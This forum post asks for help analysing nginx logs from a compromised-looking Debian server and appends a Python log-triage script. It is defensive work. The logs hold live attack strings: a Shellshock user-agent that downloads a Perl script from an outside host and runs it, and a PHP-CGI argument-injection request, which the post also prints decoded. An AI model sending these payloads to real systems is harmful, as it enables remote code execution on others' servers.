serpent
0
Hello everyone,
First of all I'd like to apologise for not having been here for so long... work ... sorry.
I have an NGINX log excerpt from a colleague here and hope you can help me analyse it.
Please move this thread if I've posted in the wrong forum.
First, the logs:
89.237.75.243 - - [18/Aug/2016:05:08:39 +0200] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
- [18/Aug/2016:05:40:06 +0200] "GET hxxp://180.163.113.82/check_proxy HTTP/1.1" 301 178 "-" "-"
- - [18/Aug/2016:05:44:10 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:06:02:22 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:06:04:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:06:20:15 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:20:17 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:53 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:54 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:06:35:55 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
- - [18/Aug/2016:07:06:13 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:07:46:22 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:08:33:29 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:10:13:19 +0200] "GET / HTTP/1.1" 301 178 "-" "=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
- - [18/Aug/2016:10:28:10 +0200] "GET /js/mage/cookies.js HTTP/1.1" 301 178 "best-bc.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
- - [18/Aug/2016:10:29:41 +0200] "HEAD /robots.txt HTTP/1.0" 301 0 "-" "-"
- - [18/Aug/2016:11:07:03 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:07:10 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:11:32:39 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:11:46:04 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
- [18/Aug/2016:12:26:32 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
- - [18/Aug/2016:12:41:00 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- - [18/Aug/2016:12:41:01 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
- [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
- - [18/Aug/2016:13:01:39 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
- [18/Aug/2016:13:10:25 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:13:55:50 +0200] "GET /impressum.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
- - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
- [18/Aug/2016:15:43:52 +0200] "GET /robots.txt HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- - [18/Aug/2016:15:43:54 +0200] "GET / HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
- [18/Aug/2016:15:44:04 +0200] "GET / HTTP/1.1" 301 178 "hxxp://uptime.com/bestbc.de" "Mozilla/5.0 (compatible; Uptimebot/0.2.35; +hxxp://www.uptime.com/uptimebot)"
- - [18/Aug/2016:16:03:58 +0200] "GET / HTTP/1.1" 301 178 "hxxp://burger-imperia.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
- - [18/Aug/2016:16:07:51 +0200] "GET hxxp://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [18/Aug/2016:16:11:57 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projekte/aktuell/sellnews HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:39 +0200] "GET /projects.htm HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:44 +0200] "GET /index.php?lang=de HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [18/Aug/2016:16:19:48 +0200] "GET /weihnachten HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- [18/Aug/2016:16:19:48 +0200] "GET /projekt-scouts.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - [19/Aug/2016:05:31:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:09 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - [19/Aug/2016:05:32:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- [19/Aug/2016:05:32:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:19 +0200] "GET /favicon.ico HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:32:21 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
- - - [19/Aug/2016:05:39:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
- - - [19/Aug/2016:08:35:45 +0200] "GET / HTTP/1.0" 301 178 "-" "www.probethenet.com scanner"
- - - [19/Aug/2016:08:35:45 +0200] "HEAD /redirect.php HTTP/1.0" 301 0 "-" "www.probethenet.com scanner"
-- - [19/Aug/2016:10:00:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
- - - [19/Aug/2016:10:25:35 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
- - [19/Aug/2016:10:31:29 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
- - [19/Aug/2016:11:31:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
- - [19/Aug/2016:12:04:18 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"
- - [19/Aug/2016:12:05:48 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"
-- - [18/Aug/2016:09:21:00 +0200] "GET / HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"
-- - [18/Aug/2016:09:21:01 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:05 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:08 +0200] "quit" 400 166 "-" "-"
-- - [18/Aug/2016:09:21:10 +0200] "" 400 0 "-" "-"
-- - [18/Aug/2016:09:21:11 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:12:31:21 +0200] "GET / HTTP/1.1" 404 162 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:24 +0200] "-" 400 0 "-" "-"
-- - [18/Aug/2016:12:31:32 +0200] "GET / HTTP/1.1" 400 264 "-" "Python-urllib/2.6"
-- - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; /bin/bash -c \x22wget -qO - hxxp://pinkiceberg.com/.mail | perl ; cd /tmp ; curl -O hxxp://pinkiceberg.com/.mail ; fetch hxxp://pinkiceberg.com/.mail ; perl .mail ;rm -rf .mail* \x22"
- - - [18/Aug/2016:05:19:13 +0200] "-" 400 0 "-" "-"
- - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - - [18/Aug/2016:06:02:20 +0200] "-" 400 0 "-" "-"
- - - [18/Aug/2016:06:02:21 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:07:07:13 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:07:07:19 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:02:07 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
- - [18/Aug/2016:08:53:59 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:09:06:00 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:10:18:46 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:10:35:29 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:10:35:30 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:01 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:11:07:02 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- - [18/Aug/2016:11:07:06 +0200] "-" 400 0 "-" "-"
- - [18/Aug/2016:11:07:07 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
- [18/Aug/2016:13:01:38 +0200] "-" 400 0 "-" "-"
- [18/Aug/2016:13:01:39 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
One entry from the first log I was able to decode (if I'm right); it looks like this:
- - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
=
176.94.194.90 - - [18/Aug/2016:11:15:16 0200] "POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosi n.simulation=on -d disable_functions="" -d open_base%6 4ir=none -d auto_prepend_file=php://input -n HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; hxxp://www.google.com/bot.html)"
The IP addresses seem to originate from China. Unfortunately I'm stuck on the following entries and so far have no idea how to decode them :wall:
- - [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
- - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
Also in the access log /var/log/nginx/nginx_devi_access.log I unfortunately have no idea where to start.
The server runs Debian 7, nginx 1.2.1 and PHP 5.6.24-1~dotdeb+7.1 (fpm-fcgi)
Many thanks for your help
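On the decoding question in the post above, as an added example (not code from the original post): a small Python triage script that reverses nginx's \xHH escaping of the request field, percent-decodes HTTP paths and query strings, and names the protocol behind the non-HTTP probes (the two entries the post could not decode are a SOCKS4 CONNECT, whose bytes 2-7 carry the destination port and IP, and a SOCKS5 client greeting; the \xFFSMBr lines are SMB Negotiate Protocol requests). The sample lines are constructed after the post's entries, with documentation-range client addresses and a placeholder hostname for the open-proxy probe.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample in the shape of the nginx access log quoted in the post.
# Client addresses are documentation-range placeholders; the request bytes of
# lines 2-4 mirror the post's own entries. A raw string keeps nginx's "\x04"
# escapes as the six literal characters they are in the log file.
SAMPLE_LOG = r'''
198.51.100.1 - - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.2 - - [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"
198.51.100.3 - - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"
198.51.100.4 - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
198.51.100.5 - - [18/Aug/2016:05:40:06 +0200] "GET http://proxy-check.example/check_proxy HTTP/1.1" 301 178 "-" "-"
198.51.100.6 - - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; echo probe"
198.51.100.7 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
'''

# One line of the "combined" format: client, ident, user, [time], "request",
# status, bytes, "referer", "user-agent". nginx escapes '"' inside fields as
# \x22, so a field never contains a raw quote and [^"]* is safe.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
ESCAPE_RE = re.compile(rb'\\x([0-9A-Fa-f]{2})')
HTTP_RE = re.compile(rb'^([A-Z]+) (\S+) HTTP/\d\.\d$')
SOCKS5_METHODS = {0: 'no-auth', 1: 'gssapi', 2: 'username/password'}


def unescape(field: str) -> bytes:
    """Reverse nginx's \\xHH escaping to recover the bytes that hit the socket."""
    return ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]),
                         field.encode('latin-1'))


def classify(request: bytes, ua: bytes) -> dict:
    """Name the protocol behind a request field and extract its useful detail."""
    if request in (b'', b'-'):
        return {'kind': 'empty-request'}          # client connected, sent nothing
    m = HTTP_RE.match(request)
    if m:
        method, target = m.group(1).decode(), m.group(2).decode('latin-1')
        path, _, query = target.partition('?')
        info = {'kind': 'http', 'method': method,
                'path': unquote(path), 'query': unquote_plus(query)}
        if target.lower().startswith(('http://', 'https://')):
            info['kind'] = 'http-open-proxy-probe'   # absolute URI: "relay this for me"
        if b'() {' in ua:
            info['kind'] = 'http-shellshock-probe'   # bash function-definition marker
        return info
    if request[:1] == b'\x04' and len(request) >= 9 and request[1] in (1, 2):
        # SOCKS4: VN=4, CD (1=CONNECT, 2=BIND), DSTPORT (2 bytes BE), DSTIP, USERID\0
        port = int.from_bytes(request[2:4], 'big')
        ip = '.'.join(str(b) for b in request[4:8])
        cmd = 'connect' if request[1] == 1 else 'bind'
        return {'kind': f'socks4-{cmd}', 'target': f'{ip}:{port}'}
    if request[:1] == b'\x05' and len(request) >= 2 and len(request) == 2 + request[1]:
        # SOCKS5 client greeting: VER=5, NMETHODS, then one byte per auth method
        methods = [SOCKS5_METHODS.get(b, f'0x{b:02x}') for b in request[2:]]
        return {'kind': 'socks5-greeting', 'auth_methods': methods}
    if request[4:8] == b'\xffSMB' and len(request) > 8:
        # NetBIOS session header (4 bytes), SMB magic, then the command byte;
        # 0x72 is Negotiate Protocol, whose body lists dialects as \x02name\x00.
        cmd = request[8]
        dialects = [d.decode('latin-1')
                    for d in re.findall(rb'\x02([^\x00]+)\x00', request[8:])]
        kind = 'smb-negotiate' if cmd == 0x72 else f'smb-command-0x{cmd:02x}'
        return {'kind': kind, 'dialects': dialects}
    if all(32 <= b < 127 for b in request):
        return {'kind': 'non-http-text', 'text': request.decode('ascii')}
    return {'kind': 'unrecognised-binary', 'length': len(request)}


def triage(log_text: str) -> list:
    """Parse every line and return one summary dict per line, in log order."""
    rows = []
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            rows.append({'kind': 'unparseable', 'line': line})
            continue
        row = classify(unescape(m['request']), unescape(m['ua']))
        row.update(client=m['client'], time=m['time'], status=int(m['status']))
        rows.append(row)
    return rows


if __name__ == '__main__':
    for row in triage(SAMPLE_LOG):
        print(row)
```

Feeding a real log file's text to triage() gives the same per-line summaries, which is enough to see that the 400-status binary entries are port-scanner protocol probes rather than anything the web server acted on.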